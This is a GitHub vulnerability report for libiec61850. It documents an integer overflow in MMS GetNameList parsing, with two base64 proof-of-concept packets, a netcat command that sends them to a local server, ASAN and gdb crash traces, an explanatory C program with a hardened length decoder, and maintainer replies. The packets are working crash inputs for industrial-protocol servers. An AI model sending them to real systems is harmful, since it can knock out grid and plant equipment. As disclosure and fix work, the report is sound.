
SegmentFault in mmsServer_handleGetNameListRequest in src/mms/iso_mms/server/mms_get_namelist_service.c #492

Closed
Alice-and-Bob opened this issue Jan 31, 2024 · 3 comments

Comments

@Alice-and-Bob

Description

An integer overflow vulnerability was detected in the mmsServer_handleGetNameListRequest function of src/mms/iso_mms/server/mms_get_namelist_service.c. The vulnerability manifests as a SEGV and causes the application to crash.

version

v1.4.0 and earlier releases

system information

Ubuntu 18.04

proof of concept

poc

root@VirtualBox:/iec61850-poc/mms_get_namelist_service# base64 poc1
AwAAQQLwgAEAAQBhNDAyAgEAoC2gKwIBGqEmoAOAAQChDYGLVEVNUExBVH////+CEExMTjAkQ0YkU3RyVmFsMjA=

root@VirtualBox:/iec61850-poc/mms_get_namelist_service# base64 poc2
AwAAPgLwgAEAAQBhMTAvAgEAoCqgKAIBbK0jgCEBoR6AHDAaoBihFhoLVEVURQLwgAEAAQBhMTAvAgEAoCqgKAIBbK0jgCEBTEQwAgFs3H/+/qEToAIARU1BVEVMRA==

poc_of_mms_get_namelist_service.zip

command

cd path/to/libiec61850-v1.4.0/examples/server_example_substitution
sudo ./server_example_substitution

cat poc | nc 0.0.0.0 102

result

Using libIEC61850 version 1.4.0
Connection opened
ASAN:DEADLYSIGNAL
=================================================================
==15239==ERROR: AddressSanitizer: SEGV on unknown address 0x630f80014827 (pc 0x5636eef01b4f bp 0x7efea42fc810 sp 0x7efea42fc570 T3)
==15239==The signal is caused by a READ memory access.
    #0 0x5636eef01b4e in mmsServer_handleGetNameListRequest src/mms/iso_mms/server/mms_get_namelist_service.c:446
    #1 0x5636eee4acfa in handleConfirmedRequestPdu src/mms/iso_mms/server/mms_server_connection.c:317
    #2 0x5636eee4c6b4 in MmsServerConnection_parseMessage src/mms/iso_mms/server/mms_server_connection.c:655
    #3 0x5636eee4c838 in messageReceived src/mms/iso_mms/server/mms_server_connection.c:696
    #4 0x5636eeea0319 in IsoConnection_handleTcpConnection src/mms/iso_server/iso_connection.c:307
    #5 0x5636eeea0faa in handleTcpConnection src/mms/iso_server/iso_connection.c:442
    #6 0x5636eee38d99 in destroyAutomaticThread hal/thread/linux/thread_linux.c:90
    #7 0x7efea8b0d6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #8 0x7efea849861e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12161e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mms/iso_mms/server/mms_get_namelist_service.c:446 in mmsServer_handleGetNameListRequest
Thread T3 created by T1 here:
    #0 0x7efea8d5cd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x5636eee38e24 in Thread_start hal/thread/linux/thread_linux.c:101
    #2 0x5636eeea16bb in IsoConnection_start src/mms/iso_server/iso_connection.c:532
    #3 0x5636eee9df3e in handleIsoConnections src/mms/iso_server/iso_server.c:414
    #4 0x5636eee9e135 in isoServerThread src/mms/iso_server/iso_server.c:493
    #5 0x7efea8b0d6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)

Thread T1 created by T0 here:
    #0 0x7efea8d5cd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x5636eee38ec8 in Thread_start hal/thread/linux/thread_linux.c:105
    #2 0x5636eee9e708 in IsoServer_startListening src/mms/iso_server/iso_server.c:611
    #3 0x5636eee42149 in MmsServer_startListening src/mms/iso_mms/server/mms_server.c:458
    #4 0x5636eee35730 in IedServer_start src/iec61850/server/impl/ied_server.c:612
    #5 0x5636eee2036e in main /home/yang/iec61850/libiec61850-1.4.0-asan/examples/server_example_substitution/server_example_substitution.c:188
    #6 0x7efea8398c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)

==15239==ABORTING

gdb

GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./libiec61850-1.4.0/examples/server_example_substitution/server_example_substitution...done.
(gdb) run
Starting program: /home/yang/iec61850/libiec61850-1.4.0/examples/server_example_substitution/server_example_substitution 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Using libIEC61850 version 1.4.0
[New Thread 0x7ffff7424700 (LWP 19188)]
[New Thread 0x7ffff6c23700 (LWP 19189)]
Connection opened
[New Thread 0x7ffff6422700 (LWP 21331)]

Thread 4 "server_example_" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff6422700 (LWP 21331)]
0x00005555555b258d in mmsServer_handleGetNameListRequest (connection=0x7ffff0024ae0, buffer=0x7ffff0000c2d "\240+\002\001\032\241&\240\003\200\001", bufPos=-2147483621, maxBufPos=45, invokeId=26, 
    response=0x7ffff6421e00) at src/mms/iso_mms/server/mms_get_namelist_service.c:446
warning: Source file is more recent than executable.
446	        uint8_t tag = buffer[bufPos++];
(gdb) print bufPos
$1 = -2147483621
(gdb) 
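The gdb frame above already tells the story: bufPos is -2147483621 at the `buffer[bufPos++]` on line 446, so the `bufPos < maxBufPos` guard is trivially true and the read lands far outside the 45-byte PDU. The following program is an added illustration and is not libiec61850 code. It embeds poc1 decoded from the base64 in the report, walks the confirmed-RequestPDU the same way the gdb frame slices it (buffer starts at the a0 2b bytes, maxBufPos = 45), and shows where the wrap comes from: the objectScope/domainSpecific element is encoded as 81 8b, a long-form BER length announcing 11 length octets, and a decoder that accumulates all of them into a 32-bit int ends up with 0x7fffffff, which wraps the next buffer position to -2147483622 (one less than the gdb value, which is read after the post-increment). The two length decoders, the offsets MMS_OFFSET/MMS_LEN and the walk are this example's own model of the buffer/bufPos/maxBufPos pattern visible in the frame and are assumptions, not the library's implementation.

```c
/*
 * Added illustration, not libiec61850 code: how the long-form BER length in
 * poc1 turns into a negative buffer position. POC1 is poc1 decoded from the
 * report's base64; the decoders and the walk are this example's own model of
 * the buffer/bufPos/maxBufPos pattern in the gdb frame (an assumption).
 */
#include <stdint.h>
#include <stdio.h>

/* poc1, 65 bytes: TPKT (03 00 00 41) + COTP DT (02 f0 80) + session (01 00 01 00)
 * + presentation-layer bytes + MMS confirmed-RequestPDU (a0 2b ...). */
static const uint8_t POC1[] = {
    0x03,0x00,0x00,0x41, 0x02,0xf0,0x80, 0x01,0x00,0x01,0x00,
    0x61,0x34, 0x30,0x32, 0x02,0x01,0x00, 0xa0,0x2d,
    0xa0,0x2b, 0x02,0x01,0x1a,                 /* confirmed-RequestPDU, invokeID 26 */
    0xa1,0x26,                                 /* getNameList request */
    0xa0,0x03,0x80,0x01,0x00,                  /* objectClass: namedVariable */
    0xa1,0x0d,                                 /* objectScope, 13 content bytes */
    0x81,0x8b,                                 /* domainSpecific: length with 11 length octets */
    0x54,0x45,0x4d,0x50,0x4c,0x41,0x54,0x7f,0xff,0xff,0xff,
    0x82,0x10, 'L','L','N','0','$','C','F','$','S','t','r','V','a','l','2','0' /* continueAfter */
};
#define MMS_OFFSET 20   /* index of a0 2b inside POC1 (buffer in the gdb frame) */
#define MMS_LEN    45   /* 2 header bytes + 43 content bytes (maxBufPos in the frame) */

typedef int (*length_decoder)(const uint8_t*, int*, int, int);

/* Naive decoder: no cap on the number of length octets. Accumulation is done in
 * uint32_t so the wrap is deterministic (in signed int it is undefined behaviour). */
static int decode_length_naive(const uint8_t* buf, int* length, int bufPos, int maxBufPos)
{
    if (bufPos >= maxBufPos) return -1;
    uint8_t len1 = buf[bufPos++];
    if (len1 & 0x80) {
        int lenLength = len1 & 0x7f;
        uint32_t acc = 0;
        for (int i = 0; i < lenLength; i++) {
            if (bufPos >= maxBufPos) return -1;
            acc = (acc << 8) | buf[bufPos++];   /* 11 octets: only the last 4 survive */
        }
        *length = (int) acc;
    } else {
        *length = len1;
    }
    return bufPos;
}

/* Hardened decoder: at most 3 length octets (no MMS PDU needs more), indefinite
 * form rejected, and the length is compared against the remaining space by
 * subtraction so the check itself cannot overflow. */
static int decode_length_safe(const uint8_t* buf, int* length, int bufPos, int maxBufPos)
{
    if (bufPos < 0 || bufPos >= maxBufPos) return -1;
    uint8_t len1 = buf[bufPos++];
    if (len1 & 0x80) {
        int lenLength = len1 & 0x7f;
        if (lenLength == 0 || lenLength > 3) return -1;
        int32_t acc = 0;
        for (int i = 0; i < lenLength; i++) {
            if (bufPos >= maxBufPos) return -1;
            acc = (acc << 8) | buf[bufPos++];   /* at most 24 bits, cannot overflow */
        }
        *length = acc;
    } else {
        *length = len1;
    }
    if (*length > maxBufPos - bufPos) return -1;
    return bufPos;
}

/* Walk the PDU to objectScope/domainSpecific and return the position a parser
 * would advance to after skipping the domain name (bufPos + length). Returns -1
 * if any length decode is rejected. */
static int skip_domain_name(length_decoder decode, int* domain_len_out)
{
    const uint8_t* buf = POC1 + MMS_OFFSET;
    int bufPos = 0, length;
    *domain_len_out = -1;
    if (buf[bufPos++] != 0xa0 || (bufPos = decode(buf, &length, bufPos, MMS_LEN)) < 0) return -1;
    if (buf[bufPos++] != 0x02 || (bufPos = decode(buf, &length, bufPos, MMS_LEN)) < 0) return -1;
    bufPos += length;                                                  /* skip invokeID */
    if (buf[bufPos++] != 0xa1 || (bufPos = decode(buf, &length, bufPos, MMS_LEN)) < 0) return -1;
    if (buf[bufPos++] != 0xa0 || (bufPos = decode(buf, &length, bufPos, MMS_LEN)) < 0) return -1;
    bufPos += length;                                                  /* skip objectClass */
    if (buf[bufPos++] != 0xa1 || (bufPos = decode(buf, &length, bufPos, MMS_LEN)) < 0) return -1;
    if (buf[bufPos++] != 0x81 || (bufPos = decode(buf, &length, bufPos, MMS_LEN)) < 0) return -1;
    *domain_len_out = length;
    /* 27 + 0x7fffffff does not fit in int; the modular uint32->int conversion
     * (implementation-defined, wrap on every mainstream compiler) yields -2147483622. */
    return (int) ((uint32_t) bufPos + (uint32_t) length);
}

/* Named accessors for the two outcomes. */
static int naive_next_bufpos(void)  { int l; return skip_domain_name(decode_length_naive, &l); }
static int naive_domain_length(void){ int l; skip_domain_name(decode_length_naive, &l); return l; }
static int safe_result(void)        { int l; return skip_domain_name(decode_length_safe, &l); }

int main(void)
{
    printf("naive: domain length 0x%x, next bufPos %d (< maxBufPos %d, so the loop keeps reading)\n",
           naive_domain_length(), naive_next_bufpos(), MMS_LEN);
    printf("safe:  result %d (PDU rejected at the 0x8b length octet)\n", safe_result());
    return 0;
}
```

The naive path lands on -2147483622, which is one less than the -2147483621 gdb prints because the frame is inspected after the post-increment in `buffer[bufPos++]`. The hardened decoder never reaches that point: the fix is to cap the number of length octets and to test `length > maxBufPos - bufPos` rather than `bufPos + length > maxBufPos`, since the latter can itself overflow.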

@Alice-and-Bob
Author

Hi @mzillgith and team. If you handle the error as soon as possible, I will provide all possible information.

@mzillgith
Contributor

Hi,
Thank you. However, you are using a very old version of the library. It seems the problem is already fixed in the current versions of the library.
But applying your poc2 seems to trigger another issue that should be fixed with commit cf94d64.

@Alice-and-Bob
Author

Hi, Thank you. However, you are using a very old version of the library. It seems the problem is already fixed in the current versions of the library. But applying your poc2 seems to trigger another issue that should be fixed with commit cf94d64.

Yes, I found the bug fixed by the cf94d64 branch using poc2 before your reply. It is possible that I am mistaken about the poc and the vulnerability it corresponds to. However, this poc can cause SEGV errors in all versions before the fix was committed. I will address this in more detail in a separate issue.
